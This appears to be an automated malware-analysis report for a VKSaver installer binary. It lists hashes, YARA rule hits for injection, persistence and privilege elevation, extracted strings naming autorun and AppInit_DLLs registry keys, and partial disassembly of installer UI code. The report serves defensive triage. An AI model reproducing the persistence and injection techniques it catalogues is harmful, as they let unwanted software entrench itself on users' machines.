File Information hashes and primary classification
File name
9aa75f19e736a06e7e1fa06f3ebff4caf14012add6f0d3624056e5278b083739
File size
654.0 KiB
Architecture
X86
- MD5
- cdd60d7161a5e773cda017aa193e2b08
- SHA1
- 024be88052355f54b0c9797816a58b848f7f1373
- SHA256
- 9aa75f19e736a06e7e1fa06f3ebff4caf14012add6f0d3624056e5278b083739
- TLSH
- T124e4cf09e1816898fd45f7714cb0281da0aade323afdaf1fd36d7071e2b43d12625a5e
- Imphash
- dca75897b2be15edc85c9566e029a0c2
- Rich header
- 6905f8c2c8f6182cccccda14862948af
Metadata parser-extracted fields
YARA Signatures 8 matching rules
Type.UNCOMMON
evasion
ProcessInjectionTargets
fingerprint
FingerprintSoftware
EnumerateProcesses
persistence
CreateScheduledTask
AutorunKey
lateral movement
ElevatePrivileges
RunShell
Type.INFO
compiler
MSVC_2012_linker
Kesakode similarity verdict
Conficker
0.7%
Tidepool
0.7%
2 malware hits
0 library hits
308 clean hits
Anomalies signals worth reviewing
entropy:
BigBufferNoXrefMediumToHighEntropy
code:
ManyHighValueImmediates
ManyUniqueImmediateBytes
SpaghettiFunction
StackArrayInitialisationX86
XorInLoop
integrity:
NoChecksum
sections:
SectionMostlyVirtual
UnbalancedVirtualPhysicalRatio
Constants identified constants and patterns
crypto:
Rijndael_rcon__32_lil_40
1
Rijndael_Td0__0x51f4a750U___32_lil_1024
1
Rijndael_Td1__0x5051f4a7U___32_lil_1024
1
Rijndael_Td2__0xa75051f4U___32_lil_1024
1
Rijndael_Td3__0xf4a75051U___32_lil_1024
1
Rijndael_Td4__0x52525252U___32_lil_1024
1
Rijndael_Te0__0xc66363a5U___32_lil_1024
1
Rijndael_Te1__0xa5c66363U___32_lil_1024
1
Rijndael_Te2__0x63a5c663U___32_lil_1024
1
Rijndael_Te3__0x6363a5c6U___32_lil_1024
1
Rijndael_Te4__0x63636363U___32_lil_1024
1
guid:
IPersistFile
2
IBootTrigger
1
IExecAction
1
ILogonTrigger
1
IShellLinkW
1
ITaskService
1
registry:
HKEY_LOCAL_MACHINE
8
HKEY_CURRENT_USER
1
runtime:
msvc_date
1
msvc_domain_error
1
msvc_locale
1
msvc_name_unknown
1
msvc_r6002
1
msvc_r6008
1
msvc_r6009
1
msvc_r6010
1
msvc_r6016
1
msvc_r6017
1
msvc_r6018
1
msvc_r6019
1
msvc_r6024
1
msvc_r6025
1
msvc_r6026
1
msvc_r6027
1
msvc_r6028
1
msvc_r6031
1
msvc_r6032
1
msvc_r6033
1
msvc_r6034
1
msvc_rl
1
msvc_sing_error
1
msvc_tloss_error
1
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x46B340 | SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver | 1 | UTF16 | 255 |
| 0x46B288 | SOFTWARE\Microsoft\Windows\CurrentVersion\Run | 1 | UTF16 | 255 |
| 0x46B3E8 | Software\Microsoft\Windows\CurrentVersion\Run | 1 | UTF16 | 255 |
| 0x46D4F0 | explorer.exe | 1 | UTF16 | 236 |
| 0x46B058 | iexplore.exe | 2 | UTF16 | 225 |
| 0x46B628 | SeDebugPrivilege | 3 | UTF16 | 208 |
| 0x46AF40 | DisplayName | 1 | UTF16 | 205 |
| 0x46AEB8 | Software\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver | 1 | UTF16 | 196 |
| 0x46AD18 | Mb=Lk | 1 | ASCII | 190 |
| 0x46D3E8 | http://legal.yandex.ru/desktop_software_agreement/ | 1 | UTF16 | 189 |
| 0x46B1C8 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | 1 | UTF16 | 188 |
| 0x46D450 | http://legal.yandex.ru/browser_agreement/ | 1 | UTF16 | 181 |
| 0x46AE20 | %s\Opera\Opera\operaprefs.ini | 1 | UTF16 | 176 |
| 0x46D3A8 | http://www.audiovkontakte.ru/ | 1 | UTF16 | 172 |
| 0x46AE5C | Software\Opera Software | 1 | UTF16 | 170 |
| 0x46D1A0 | --partner vksaver-elements --distr /quiet /msicl " | 1 | UTF16 | 169 |
| 0x46D16C | http://audiovkontakte.ru | 1 | UTF16 | 167 |
| 0x46D4DC | ntdll.dll | 1 | UTF16 | 162 |
| 0x46C988 | \downloader.exe | 1 | UTF16 | 159 |
| 0x46B50C | Uninstall.lnk | 1 | UTF16 | 159 |
| 0x46B5B0 | vkontakte.ru .vkontakte.ru *.vkontakte.ru vk.com .vk.com *.vk.com audiovkontakte.ru v.audiovkontakte.ru | 1 | ASCII | 155 |
| 0x46D538 | totalcmd64.exe | 1 | UTF16 | 154 |
| 0x46D770 | \vksaver3.dll | 1 | UTF16 | 154 |
| 0x46C960 | http://vk.com | 1 | UTF16 | 154 |
| 0x46D51C | totalcmd.exe | 1 | UTF16 | 154 |
| 0x46D4A4 | riched20.dll | 1 | UTF16 | 154 |
| 0x46D70C | vksaver3.dll | 1 | UTF16 | 154 |
| 0x46B0E8 | maxthon.exe | 1 | UTF16 | 154 |
| 0x40EA50 | mscoree.dll | 1 | UTF16 | 154 |
| 0x46D728 | VKSaver.exe | 1 | UTF16 | 154 |
| 0x46D758 | readme.txt | 1 | UTF16 | 154 |
| 0x46B484 | Launch VKSaver.lnk | 1 | UTF16 | 153 |
| 0x46ADB4 | SOFTWARE\Microsoft\Cryptography | 1 | ASCII | 152 |
| 0x46B074 | firefox.exe | 2 | UTF16 | 152 |
| 0x46B564 | \operaprefs_fixed.ini | 1 | ASCII | 152 |
| 0x46B684 | Microsoft Internet Explorer | 1 | UTF16 | 150 |
| 0x46B4D0 | Readme.lnk | 1 | UTF16 | 150 |
| 0x46D50C | far.exe | 1 | UTF16 | 150 |
| 0x46B64C | vksaver.exe | 2 | UTF16 | 149 |
| 0x46B0D0 | browser.exe | 3 | UTF16 | 149 |
| 0x46B444 | \VKSaver.lnk | 1 | UTF16 | 148 |
| 0x46B460 | VKSaver.lnk | 1 | UTF16 | 147 |
| 0x46B0B8 | safari.exe | 2 | UTF16 | 146 |
| 0x46B0A0 | chrome.exe | 2 | UTF16 | 146 |
| 0x46D740 | config.dat | 1 | UTF16 | 146 |
| 0x46B08C | opera.exe | 2 | UTF16 | 146 |
| 0x40F414 | Runtime Error!\n\nProgram: | 1 | UTF16 | 144 |
| 0x46B304 | SOFTWARE\VKSaver | 2 | UTF16 | 144 |
| 0x46E4CC | CreateToolhelp32Snapshot | 0 | ASCII | 144 |
| 0x46AF9C | UninstallString | 1 | UTF16 | 143 |
| 0x411DFC | USER32.DLL | 2 | UTF16 | 142 |
| 0x46B190 | NT AUTHORITY\SYSTEM | 1 | UTF16 | 141 |
| 0x46D12C | msctls_progress32 | 1 | UTF16 | 141 |
| 0x46B120 | AudioVkontakte.ru | 1 | UTF16 | 141 |
| 0x46D558 | vksaver-install | 1 | UTF16 | 141 |
| 0x40E53C | GetLogicalProcessorInformation | 1 | ASCII | 140 |
| 0x46AE8C | Last CommandLine v2 | 1 | UTF16 | 139 |
| 0x40E520 | GetCurrentProcessorNumber | 1 | ASCII | 139 |
| 0x40E570 | SetDefaultDllDirectories | 1 | ASCII | 139 |
| 0x40E46C | WaitForThreadpoolTimerCallbacks | 1 | ASCII | 138 |
| 0x46B2E4 | VKSaverUpdater | 1 | UTF16 | 138 |
| 0x40E3F8 | InitializeCriticalSectionEx | 1 | ASCII | 138 |
| 0x40E428 | SetThreadStackGuarantee | 1 | ASCII | 138 |
| 0x46B618 | -popup | 1 | UTF16 | 138 |
| 0x40E500 | FreeLibraryWhenCallbackReturns | 1 | ASCII | 137 |
| 0x46AF7C | "%s" -uninstall | 1 | UTF16 | 136 |
| 0x46B010 | DisplayVersion | 1 | UTF16 | 136 |
| 0x46D150 | SysListView32 | 1 | UTF16 | 136 |
| 0x40E4E4 | FlushProcessWriteBuffers | 1 | ASCII | 136 |
| 0x46E85C | AdjustTokenPrivileges | 0 | ASCII | 136 |
| 0x46ADF8 | VKSaverInstallerMtx | 3 | UTF16 | 135 |
| 0x46D580 | audiovkontakte.ru | 2 | UTF16 | 135 |
| 0x411E60 | GetProcessWindowStation | 1 | ASCII | 135 |
| 0x40E440 | CreateThreadpoolTimer | 1 | ASCII | 135 |
| 0x46B528 | -uninstall | 1 | UTF16 | 135 |
| 0x46EA48 | ShellExecuteW | 0 | ASCII | 135 |
| 0x40E5E0 | GetUserDefaultLocaleName | 1 | ASCII | 134 |
| 0x46D4C0 | NtQuerySystemInformation | 1 | ASCII | 134 |
| 0x40E4A4 | CreateThreadpoolWait | 1 | ASCII | 134 |
| 0x40E48C | CloseThreadpoolTimer | 1 | ASCII | 134 |
| 0x46B044 | %s_%u.tmp | 2 | UTF16 | 134 |
| 0x46B664 | - Apple Safari | 1 | UTF16 | 133 |
| 0x46D21C | YAHOMEPAGE=y | 1 | UTF16 | 133 |
| 0x46D2C4 | YBSENDSTAT=n | 1 | UTF16 | 133 |
| 0x46D2A8 | YBSENDSTAT=y | 1 | UTF16 | 133 |
| 0x46D238 | YAHOMEPAGE=n | 1 | UTF16 | 133 |
| 0x411E44 | GetUserObjectInformationW | 1 | ASCII | 133 |
| 0x46AFF8 | %d.%d.%d.%d | 1 | UTF16 | 133 |
| 0x46B030 | %s%u.tmp | 2 | UTF16 | 133 |
| 0x46E4A8 | Process32NextW | 0 | ASCII | 133 |
| 0x46B328 | Install_Dir | 1 | UTF16 | 132 |
| 0x46CA38 | RichEdit20W | 1 | UTF16 | 132 |
| 0x46D78C | -vk2kill | 1 | UTF16 | 132 |
| 0x46C9B8 | Static | 1 | UTF16 | 132 |
| 0x46ADD4 | VKSaverInstallWnd | 3 | UTF16 | 131 |
| 0x46B264 | LoadAppInit_DLLs | 2 | UTF16 | 131 |
| 0x46B104 | -autoupdate | 2 | UTF16 | 131 |
| 0x40E458 | SetThreadpoolTimer | 1 | ASCII | 131 |
| 0x40E414 | CreateSemaphoreExW | 1 | ASCII | 131 |
| 0x46CE1E | <a href="http://legal.yandex.ru/desktop_software_agreement/"> | 0 | UTF16 | 130 |
| 0x40E620 | GetCurrentPackageId | 1 | ASCII | 130 |
| 0x40E4D0 | CloseThreadpoolWait | 1 | ASCII | 130 |
| 0x46D2E0 | YABROWSER=n | 1 | UTF16 | 129 |
| 0x46D270 | YAQSEARCH=n | 1 | UTF16 | 129 |
| 0x46D254 | YAQSEARCH=y | 1 | UTF16 | 129 |
| 0x46D28C | YABROWSER=y | 1 | UTF16 | 129 |
| 0x46AF64 | DisplayIcon | 1 | UTF16 | 129 |
| 0x46D7A0 | -newupdate | 1 | UTF16 | 129 |
| 0x411E30 | GetLastActivePopup | 1 | ASCII | 129 |
| 0x40E4BC | SetThreadpoolWait | 1 | ASCII | 129 |
| 0x40E5FC | IsValidLocaleName | 1 | ASCII | 129 |
| 0x40E5B0 | GetDateFormatEx | 1 | ASCII | 129 |
| 0x46FD84 | VKSaverUpdate | 4 | UTF16 | 128 |
| 0x46B6DC | Opera browser | 3 | UTF16 | 128 |
| 0x46B6F8 | Google Chrome | 3 | UTF16 | 128 |
| 0x46B234 | AppInit_DLLs | 3 | UTF16 | 128 |
| 0x40E58C | EnumSystemLocalesEx | 1 | ASCII | 128 |
| 0x46D208 | ILIGHT=1 | 1 | UTF16 | 128 |
| 0x46AFE4 | Publisher | 1 | UTF16 | 128 |
| 0x40E3D8 | FlsFree | 1 | ASCII | 128 |
| 0x40E5D0 | GetTimeFormatEx | 1 | ASCII | 127 |
| 0x411E20 | GetActiveWindow | 1 | ASCII | 127 |
| 0x40EA68 | CorExitProcess | 1 | ASCII | 127 |
| 0x40E3CC | FlsAlloc | 1 | ASCII | 127 |
| 0x46B6BC | Mozilla Firefox | 2 | UTF16 | 126 |
| 0x46B750 | Maxthon browser | 3 | UTF16 | 126 |
| 0x411E78 | CONOUT$ | 1 | UTF16 | 126 |
| 0x46B730 | Yandex browser | 3 | UTF16 | 125 |
| 0x40E55C | CreateSymbolicLinkW | 1 | ASCII | 125 |
| 0x46B59C | vkontakte.ru | 1 | ASCII | 125 |
| 0x40E3E0 | FlsGetValue | 1 | ASCII | 125 |
| 0x40E3EC | FlsSetValue | 1 | ASCII | 125 |
| 0x411E14 | MessageBoxW | 1 | ASCII | 125 |
| 0x46B1B8 | runas | 1 | UTF16 | 125 |
| 0x46C94C | open | 1 | UTF16 | 125 |
| 0x46C97C | %x%x | 1 | UTF16 | 125 |
| 0x46B714 | Apple Safari | 3 | UTF16 | 124 |
| 0x40E5C0 | GetLocaleInfoEx | 1 | ASCII | 124 |
| 0x46B254 | vksaver | 2 | UTF16 | 124 |
| 0x46C9E8 | Button | 18 | UTF16 | 124 |
| 0x46C9A8 | Tahoma | 3 | UTF16 | 124 |
| 0x46D088 | <a href="http://legal.yandex.ru/browser_agreement/"> | 0 | UTF16 | 122 |
| 0x46B57C | Opera Turbo bypass URLs | 2 | ASCII | 122 |
| 0x40E5A0 | CompareStringEx | 1 | ASCII | 122 |
| 0x46ADA8 | MachineGuid | 1 | ASCII | 122 |
| 0x46B3C0 | \VKSaver | 2 | UTF16 | 119 |
| 0x46FDA0 | VKSaver | 2 | UTF16 | 119 |
| 0x46CED0 | SysLink | 2 | UTF16 | 119 |
| 0x46AF30 | VKSaver | 3 | UTF16 | 119 |
| 0x46B3D4 | "%s" %s | 2 | UTF16 | 119 |
| 0x40E610 | LCMapStringEx | 1 | ASCII | 119 |
| 0x4E54E3 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifes... | 0 | ASCII | 118 |
| 0x46E018 | KERNEL32.DLL | 1 | ASCII | 118 |
| 0x46B478 | %s\%s | 4 | UTF16 | 117 |
| 0x40E65C | ko-KR | 3 | UTF16 | 117 |
| 0x46CA2C | Arial | 3 | UTF16 | 117 |
| 0x46AF58 | "%s" | 2 | UTF16 | 117 |
| 0x46E060 | PSAPI.DLL | 1 | ASCII | 116 |
| 0x46E049 | ole32.dll | 1 | ASCII | 116 |
| 0x46E025 | ADVAPI32.dll | 1 | ASCII | 115 |
| 0x46E032 | COMCTL32.dll | 1 | ASCII | 115 |
| 0x46E06A | SHELL32.dll | 1 | ASCII | 115 |
| 0x46E08D | WS2_32.dll | 1 | ASCII | 115 |
| 0x46E053 | OLEAUT32.dll | 1 | ASCII | 112 |
| 0x46E081 | VERSION.dll | 1 | ASCII | 112 |
| 0x46E076 | USER32.dll | 1 | ASCII | 112 |
| 0x46E03F | GDI32.dll | 1 | ASCII | 112 |
| 0x40F87A | h(((( H | 2 | UTF16 | 111 |
| 0x40F2E0 | runtime error | 1 | UTF16 | 110 |
| 0x40E668 | zh-TW | 3 | UTF16 | 110 |
| 0x40E650 | zh-CN | 3 | UTF16 | 110 |
| 0x46B594 | Proxy | 2 | ASCII | 109 |
| 0x411298 | sr-SP-Cyrl | 1 | UTF16 | 107 |
| 0x41141C | sr-BA-Cyrl | 1 | UTF16 | 107 |
| 0x410F48 | et-EE | 1 | UTF16 | 104 |
| 0x4114DC | en-TT | 1 | UTF16 | 104 |
| 0x4111BC | nn-NO | 1 | UTF16 | 104 |
| 0x411038 | kk-KZ | 1 | UTF16 | 104 |
| 0x411074 | tt-RU | 1 | UTF16 | 104 |
| 0x4111D4 | sr-SP-Latn | 1 | UTF16 | 103 |
| 0x411378 | bs-BA-Latn | 1 | UTF16 | 103 |
| 0x4113D0 | sr-BA-Latn | 1 | UTF16 | 103 |
| 0x410F90 | az-AZ-Latn | 1 | UTF16 | 103 |
| 0x411468 | sms-FI | 1 | UTF16 | 103 |
| 0x411110 | kok-IN | 1 | UTF16 | 103 |
| 0x46D8F8 | C:\_dev\vksaver\BuildOutput\vksaver-install.pdb | 0 | ASCII | 101 |
| 0x4111F8 | az-AZ-Cyrl | 1 | UTF16 | 100 |
| 0x41105C | uz-UZ-Latn | 1 | UTF16 | 100 |
| 0x411228 | uz-UZ-Cyrl | 1 | UTF16 | 100 |
| 0x4D8031 | @JJ7?4@?Q@00474@4K?Q@??J@+@@0@@@X0-?J-?Q@70@@-?@@4@?4Q4@J74Q?,K?0Q-0@4?0@0@@@?@7?4@?050????05??0???J???0????0?0?0????... | 0 | ASCII | 97 |
| 0x4D892A | "<D///>//D/>>DD//////D>//>D//D>D/>>D//////D>D>//DD>>D///>/D>/D>//D>///>D/D>////D>D>/D//D///D>//D//PTlm")?>D///D///>D>... | 0 | ASCII | 97 |
| 0x4C9AAC | o<<<<<<E<<<<<<<<<<<P&:<<<<<<<E<<E<E<E<<<<<E<<<<<<<<<<<<<<5/3P5<<<<<<<<<<<<<<<<<<<<<<<E<E<E<E<<<<E<<<P)1:5<<<<<<<<3CP<... | 0 | ASCII | 97 |
| 0x40F3B6 | @R6002\r\n- floating point support not loaded\r\n | 0 | UTF16 | 97 |
| 0x411390 | smj-SE | 1 | UTF16 | 97 |
| 0x4113E8 | sma-NO | 1 | UTF16 | 97 |
| 0x411434 | sma-SE | 1 | UTF16 | 97 |
| 0x41149C | smn-FI | 1 | UTF16 | 97 |
| 0x411320 | smj-NO | 1 | UTF16 | 97 |
| 0x411120 | syr-SY | 1 | UTF16 | 97 |
| 0x411130 | div-MV | 1 | UTF16 | 97 |
| 0x4114AC | ar-SY | 1 | UTF16 | 97 |
| 0x410E1C | de-DE | 1 | UTF16 | 97 |
| 0x410E28 | el-GR | 1 | UTF16 | 97 |
| 0x410E34 | fi-FI | 1 | UTF16 | 97 |
| 0x410E40 | fr-FR | 1 | UTF16 | 97 |
| 0x410E4C | he-IL | 1 | UTF16 | 97 |
| 0x410E58 | hu-HU | 1 | UTF16 | 97 |
| 0x410E64 | is-IS | 1 | UTF16 | 97 |
| 0x410E70 | it-IT | 1 | UTF16 | 97 |
| 0x410E7C | nl-NL | 1 | UTF16 | 97 |
| 0x410E88 | nb-NO | 1 | UTF16 | 97 |
| 0x411180 | en-GB | 1 | UTF16 | 97 |
| 0x410E94 | pl-PL | 1 | UTF16 | 97 |
| 0x410EA0 | pt-BR | 1 | UTF16 | 97 |
| 0x410EAC | ro-RO | 1 | UTF16 | 97 |
| 0x4111B0 | nl-BE | 1 | UTF16 | 97 |
| 0x410EB8 | ru-RU | 1 | UTF16 | 97 |
| 0x410EC4 | hr-HR | 1 | UTF16 | 97 |
| 0x4111A4 | it-CH | 1 | UTF16 | 97 |
| 0x410ED0 | sk-SK | 1 | UTF16 | 97 |
| 0x410EDC | sq-AL | 1 | UTF16 | 97 |
| 0x411198 | fr-BE | 1 | UTF16 | 97 |
| 0x410EE8 | sv-SE | 1 | UTF16 | 97 |
| 0x410EF4 | th-TH | 1 | UTF16 | 97 |
| 0x410F00 | tr-TR | 1 | UTF16 | 97 |
| 0x410F0C | ur-PK | 1 | UTF16 | 97 |
| 0x410F18 | id-ID | 1 | UTF16 | 97 |
| 0x410F24 | uk-UA | 1 | UTF16 | 97 |
| 0x410F30 | be-BY | 1 | UTF16 | 97 |
| 0x411008 | hi-IN | 1 | UTF16 | 97 |
| 0x410F3C | sl-SI | 1 | UTF16 | 97 |
| 0x410F54 | lv-LV | 1 | UTF16 | 97 |
| 0x410F60 | lt-LT | 1 | UTF16 | 97 |
| 0x410F6C | fa-IR | 1 | UTF16 | 97 |
| 0x410F78 | vi-VN | 1 | UTF16 | 97 |
| 0x410F84 | hy-AM | 1 | UTF16 | 97 |
| 0x410FA8 | eu-ES | 1 | UTF16 | 97 |
| 0x410FB4 | mk-MK | 1 | UTF16 | 97 |
| 0x410FC0 | tn-ZA | 1 | UTF16 | 97 |
| 0x410FCC | xh-ZA | 1 | UTF16 | 97 |
| 0x410FE4 | af-ZA | 1 | UTF16 | 97 |
| 0x410FF0 | ka-GE | 1 | UTF16 | 97 |
| 0x410FFC | fo-FO | 1 | UTF16 | 97 |
| 0x411014 | mt-MT | 1 | UTF16 | 97 |
| 0x411020 | se-NO | 1 | UTF16 | 97 |
| 0x4113AC | en-IE | 1 | UTF16 | 97 |
| 0x4113B8 | es-PA | 1 | UTF16 | 97 |
| 0x4113C4 | fr-MC | 1 | UTF16 | 97 |
| 0x4113F8 | ar-TN | 1 | UTF16 | 97 |
| 0x411404 | en-ZA | 1 | UTF16 | 97 |
| 0x411410 | es-DO | 1 | UTF16 | 97 |
| 0x41136C | fr-LU | 1 | UTF16 | 97 |
| 0x411444 | ar-OM | 1 | UTF16 | 97 |
| 0x411450 | en-JM | 1 | UTF16 | 97 |
| 0x41145C | es-VE | 1 | UTF16 | 97 |
| 0x4113A0 | ar-MA | 1 | UTF16 | 97 |
Functions high-value functions
Function listings
0x404DC0 sub_404dc0 str 50 api 49 imm 75 Unknown
sub_404dc0() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
sub esp, 0x88
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x84], eax
mov ecx, [ebp+0x0C]
push esi
mov esi, [ebp+0x08]
push edi
mov edi, [ebp+0x14]
mov [esp+0x10], esi
mov [esp+0x14], edi
cmp ecx, 0x4E
jnbe .11
jz .6
mov eax, ecx
dec eax
jz .2
dec eax
jz .1
sub eax, 0x0D
jnz .12
lea eax, [esp+0x48]
push eax
push esi
call [user32.BeginPaint]
mov ecx, eax
call sub_4042c0()
lea eax, [esp+0x48]
push eax
push esi
call [user32.EndPaint]
push edi
push [ebp+0x10]
push 0x0F
push esi
call [user32.DefWindowProcW]
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.1:
push 0x00
call [user32.PostQuitMessage]
xor eax, eax
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.2:
push "Tahoma"
push 0x00
push 0x05
push 0x00
push 0x00
push 0x01
push 0x00
push 0x00
push 0x00
push 0x190
push 0x00
push 0x00
push 0x00
push 0x0D
call [gdi32.CreateFontW]
push "Tahoma"
push 0x00
push 0x05
push 0x00
push 0x00
push 0x01
push 0x00
push 0x00
push 0x00
push 0x2BC
push 0x00
push 0x00
push 0x00
push 0x0D
mov [0x4B14A0], eax
call [gdi32.CreateFontW]
push 0x00
push [0x4B2010]
mov [0x4B14A4], eax
push 0x00
push esi
push 0x02
push 0x1C0
push 0x139
push 0x18
push 0x50000000
push 0x00
push "Static"
push 0x20000
call [user32.CreateWindowExW]
mov eax, [0x4B1044]
push 0x00
cmp eax, 0xC8
jnz .3
push [0x4B2010]
push 0x00
push esi
push 0x18
push 0xAA
push 0x148
push 0xDC
push 0x50010001
push 0x46C9C8
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x00
push [0x4B2010]
mov [0x4B1484], eax
push 0x00
push esi
push 0x18
push 0x4B
push 0x148
push 0x190
push 0x50010000
push 0x46C9F8
push "Button"
push 0x00
call [user32.CreateWindowExW]
mov esi, [user32.SendMessageW]
push 0x00
push [0x4B14A0]
mov [0x4B1480], eax
push 0x30
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1480]
call esi
mov esi, [esp+0x10]
push edi
push [ebp+0x10]
push 0x01
push esi
call [user32.DefWindowProcW]
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.3:
cmp eax, 0x64
jnz .5
push [0x4B2010]
push 0x00
push esi
push 0x18
push eax
push 0x148
push 0x122
push 0x50010001
push 0x46CA04
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x00
push [0x4B2010]
mov [0x4B1484], eax
push 0x00
push esi
push 0x18
push 0x4B
push 0x148
push 0x190
push 0x50010000
push 0x46CA1C
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x40
push 0x10
push 0x10
push 0x01
push 0x86
push [0x4B2010]
mov [0x4B1480], eax
call [user32.LoadImageW]
mov esi, [user32.SendMessageW]
push eax
push 0x01
push 0xF7
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1480]
call esi
mov esi, [esp+0x10]
push edi
push [ebp+0x10]
push 0x01
push esi
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_404dc0(int32_t *param_1,undefined *param_2,undefined4 param_3,int32_t *param_4)
{
int16_t *piVar1;
undefined auVar2 [12];
uint32_t uVar3;
undefined auVar4 [12];
code *pcVar5;
char cVar6;
undefined4 uVar7;
int32_t iVar8;
undefined4 *puVar9;
undefined4 *puVar10;
undefined4 uVar11;
undefined auStack_750 [4];
undefined auStack_74c [12];
undefined auStack_740 [12];
undefined4 uStack_734;
undefined4 uStack_730;
undefined4 uStack_72c;
undefined4 uStack_728;
undefined4 uStack_724;
undefined4 uStack_720;
undefined4 uStack_71c;
undefined4 uStack_718;
undefined4 uStack_714;
undefined4 uStack_710;
undefined4 uStack_70c;
uint32_t uStack_708;
undefined4 uStack_704;
undefined4 uStack_700;
undefined4 uStack_6fc;
undefined4 uStack_6f8;
undefined4 uStack_6f4;
undefined4 uStack_6f0;
undefined4 uStack_6ec;
undefined4 uStack_6e8;
undefined4 uStack_6e4;
undefined4 uStack_6e0;
undefined4 uStack_6dc;
undefined4 uStack_6d8;
undefined4 uStack_6d4;
undefined4 uStack_6d0;
undefined4 uStack_6cc;
undefined4 uStack_6c8;
undefined4 uStack_6c4;
undefined4 uStack_6c0;
undefined4 uStack_6bc;
undefined4 uStack_6b8;
undefined4 uStack_6b4;
undefined4 uStack_6b0;
undefined4 uStack_6ac;
undefined4 uStack_6a8;
undefined4 uStack_6a4;
undefined4 uStack_6a0;
undefined4 uStack_69c;
undefined4 uStack_698;
undefined4 uStack_694;
undefined4 uStack_690;
undefined4 uStack_68c;
undefined4 uStack_688;
undefined4 uStack_684;
undefined4 uStack_680;
undefined4 uStack_67c;
undefined4 uStack_678;
undefined4 uStack_674;
undefined4 uStack_670;
undefined4 uStack_66c;
undefined4 uStack_668;
undefined4 uStack_664;
undefined4 uStack_660;
undefined4 uStack_65c;
undefined4 uStack_658;
undefined4 uStack_654;
undefined4 uStack_650;
undefined4 uStack_64c;
uint32_t uStack_648;
undefined4 uStack_644;
undefined4 uStack_640;
undefined4 uStack_63c;
undefined4 uStack_638;
undefined4 uStack_634;
undefined4 uStack_630;
undefined4 uStack_62c;
undefined4 uStack_628;
undefined4 uStack_624;
undefined4 uStack_620;
undefined4 uStack_61c;
uint32_t uStack_618;
undefined4 uStack_614;
undefined4 uStack_610;
undefined4 uStack_60c;
undefined4 uStack_608;
undefined4 uStack_604;
undefined4 uStack_600;
undefined4 uStack_5fc;
undefined4 uStack_5f8;
undefined4 uStack_5f4;
undefined4 uStack_5f0;
undefined4 uStack_5ec;
uint32_t uStack_5e8;
undefined4 uStack_5e4;
undefined4 uStack_5e0;
undefined4 uStack_5dc;
undefined4 uStack_5d8;
undefined4 uStack_5d4;
undefined4 uStack_5d0;
undefined4 uStack_5cc;
undefined4 uStack_5c8;
undefined4 uStack_5c4;
undefined4 uStack_5c0;
undefined4 uStack_5bc;
undefined4 uStack_5b8;
undefined4 uStack_5b4;
undefined4 uStack_5b0;
undefined4 uStack_5ac;
undefined4 uStack_5a8;
undefined4 uStack_5a4;
undefined4 uStack_5a0;
undefined4 uStack_59c;
undefined4 uStack_598;
undefined4 uStack_594;
undefined4 uStack_590;
undefined4 uStack_58c;
undefined4 uStack_588;
undefined4 uStack_584;
undefined4 uStack_580;
undefined4 uStack_57c;
undefined4 uStack_578;
undefined4 uStack_574;
undefined4 uStack_570;
undefined4 uStack_56c;
undefined4 uStack_568;
undefined4 uStack_564;
undefined4 uStack_560;
undefined4 uStack_55c;
uint32_t uStack_558;
undefined4 uStack_554;
undefined4 uStack_550;
undefined4 uStack_54c;
undefined4 uStack_548;
undefined4 uStack_544;
undefined4 uStack_540;
undefined4 uStack_53c;
undefined4 uStack_538;
undefined4 uStack_534;
undefined4 uStack_530;
undefined4 uStack_52c;
uint32_t uStack_528;
undefined4 uStack_524;
undefined4 uStack_520;
undefined4 uStack_51c;
undefined4 uStack_518;
undefined4 uStack_514;
undefined4 uStack_510;
undefined4 uStack_50c;
undefined4 uStack_508;
undefined4 uStack_504;
undefined4 uStack_500;
undefined4 uStack_4fc;
uint32_t uStack_4f8;
undefined4 uStack_4f4;
undefined4 uStack_4f0;
undefined4 uStack_4ec;
undefined4 uStack_4e8;
undefined4 uStack_4e4;
undefined4 uStack_4e0;
undefined4 uStack_4dc;
undefined4 uStack_4d8;
undefined4 uStack_4d4;
undefined4 uStack_4d0;
undefined4 uStack_4cc;
uint32_t uStack_4c8;
undefined4 uStack_4c4;
undefined4 uStack_4c0;
undefined4 uStack_4bc;
undefined4 uStack_4b8;
undefined4 uStack_4b4;
undefined4 uStack_4b0;
undefined4 uStack_4ac;
undefined4 uStack_4a8;
undefined4 uStack_4a4;
undefined4 uStack_4a0;
undefined4 uStack_49c;
uint32_t uStack_498;
undefined4 uStack_494;
undefined4 uStack_490;
undefined4 uStack_48c;
undefined4 uStack_488;
undefined4 uStack_484;
undefined4 uStack_480;
undefined4 uStack_47c;
undefined4 uStack_478;
undefined4 uStack_474;
undefined4 uStack_470;
undefined4 uStack_46c;
uint32_t uStack_468;
undefined4 uStack_464;
undefined4 uStack_460;
undefined4 uStack_45c;
undefined4 uStack_458;
undefined4 uStack_454;
undefined4 uStack_450;
undefined4 uStack_44c;
undefined4 uStack_448;
undefined4 uStack_444;
undefined4 uStack_440;
undefined4 uStack_43c;
undefined4 uStack_438;
undefined4 uStack_434;
undefined4 uStack_430;
undefined4 uStack_42c;
undefined4 uStack_428;
undefined4 uStack_424;
undefined4 uStack_420;
undefined4 uStack_41c;
undefined4 uStack_418;
/* listing truncated */0x403580 sub_403580 str 25 api 4 imm 17 Unknown
